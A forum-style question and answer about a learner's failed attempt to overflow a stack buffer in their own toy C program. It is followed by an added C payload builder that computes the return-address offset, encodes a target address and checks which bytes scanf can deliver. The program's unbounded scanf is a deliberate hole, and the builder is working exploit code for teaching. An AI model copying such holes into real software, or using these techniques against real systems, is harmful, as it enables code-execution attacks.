
Can't exploit stack overflow

I'm learning buffer overflows, and I have a problem with exploiting a stack-based buffer overflow. Here is my program:

#include <stdio.h>

/* Never called by the program itself; the goal is to return into it. */
void func(void){
    printf("asd");
}

int main(void){
    char buf[10];
    /* Deliberately unbounded: %s with no width limit overflows buf.
       The original passed &buf (a char (*)[10]); %s expects a char *,
       and buf is the same address with the right type. */
    scanf("%s", buf);
    return 0;
}

I'm overwriting the first 14 bytes with A's (the buffer and the old EIP address). My goal is to execute the func function, or to change EIP to its address. But I'm always getting an illegal instruction. I have checked the hex address of the function; I have written it in reverse order and it is correct.

You will have to look at the compiled code in assembler, e.g. your main() may look like:

    char buf[10];
    scanf("%s", &buf);
00D7B938  mov         esi,esp  
00D7B93A  lea         eax,[ebp-14h]  
00D7B93D  push        eax  
00D7B93E  push        offset string "%s" (0D818D4h)  
00D7B943  call        dword ptr [__imp__scanf (0D89684h)]  

You'll have to debug to see what is actually on the stack at this point; e.g. if you are compiling in debug, it is highly likely there's a lot more on the stack than you may think!
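Added example (not part of the question or the answer above): a small C payload builder that turns the frame layout visible in that listing into the input string, and checks whether scanf("%s") can actually deliver it. The only figure taken from the page is the buffer displacement 0x14 from `lea eax,[ebp-14h]`: with a frame pointer, the saved EBP sits at [ebp] and the return address at [ebp+4], so the return address starts 0x14 + 4 = 24 bytes into buf, not 14. The two func addresses (0x00D7B910 and 0x00D7B920) are hypothetical placeholders chosen to look like the answer's build; the page does not show func's real address. The check encodes a caveat the question does not mention: %s stops at whitespace and never copies a NUL from the input, so an address containing 0x20, 0x09..0x0D or an embedded 0x00 cannot be written this way, although a 0x00 top byte at the very end is reachable because scanf writes the terminator there itself.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit frame-pointer layout, as in the listing above:
 *   [ebp - buf_disp]  start of buf     (lea eax,[ebp-14h] -> buf_disp = 0x14)
 *   [ebp]             saved EBP
 *   [ebp + 4]         saved return address
 * so the return address starts buf_disp + 4 bytes after buf, not sizeof(buf) + 4. */
size_t offset_to_return_address(size_t buf_disp_from_ebp)
{
    return buf_disp_from_ebp + 4;
}

/* Store a 32-bit address in little-endian (x86) byte order. */
static void put_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)(v);
    dst[1] = (uint8_t)(v >> 8);
    dst[2] = (uint8_t)(v >> 16);
    dst[3] = (uint8_t)(v >> 24);
}

/* Fill out[] with ret_offset filler bytes followed by target, little-endian.
 * Returns the payload length, or 0 if out_cap is too small to hold it. */
size_t build_payload(uint8_t *out, size_t out_cap, size_t ret_offset, uint32_t target)
{
    if (ret_offset + 4 > out_cap)
        return 0;
    memset(out, 'A', ret_offset);
    put_le32(out + ret_offset, target);
    return ret_offset + 4;
}

/* scanf("%s") stops at the first whitespace byte and never stores a NUL taken
 * from the input, so such bytes cannot be part of the payload. The one exception
 * is a 0x00 as the very last byte: scanf writes the string terminator there
 * itself, which is how a top address byte of 0x00 can still land in memory.
 * Returns the index of the first undeliverable byte, or -1 if all are fine. */
int first_unsendable_byte(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (p[i] == 0)
            return (i + 1 == n) ? -1 : (int)i;
        if (isspace(p[i]))
            return (int)i;
    }
    return -1;
}

/* Hypothetical addresses for func in the answer's build (the page only shows
 * main's code near 0x00D7B938). */
#define FUNC_ADDR_OK  0x00D7B910u   /* bytes 10 b9 d7 00: deliverable */
#define FUNC_ADDR_BAD 0x00D7B920u   /* bytes 20 b9 d7 00: 0x20 is a space */

int main(void)
{
    uint8_t payload[64];
    size_t off = offset_to_return_address(0x14);   /* 24 bytes, not 14 */
    size_t n = build_payload(payload, sizeof payload, off, FUNC_ADDR_OK);
    int bad = first_unsendable_byte(payload, n);
    if (n == 0 || bad >= 0) {
        fprintf(stderr, "byte %d (0x%02x) cannot pass through scanf(\"%%s\")\n",
                bad, bad >= 0 ? payload[bad] : 0);
        return 1;
    }
    /* Send only what scanf will store; a trailing 0x00 comes from the terminator. */
    size_t send = (payload[n - 1] == 0) ? n - 1 : n;
    fwrite(payload, 1, send, stdout);
    return 0;
}
```

Usage: `./payload | ./vuln`, after reading the real displacement and func's address out of your own build's disassembly rather than the values hard-coded here. On a current GCC/Linux toolchain the 32-bit frame-pointer layout the answer shows is only reproduced with something like `gcc -m32 -O0 -fno-stack-protector -no-pie`; a stack canary or a different frame layout moves the return address again, which is exactly why the answer says to look at the stack in a debugger before choosing the offset.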
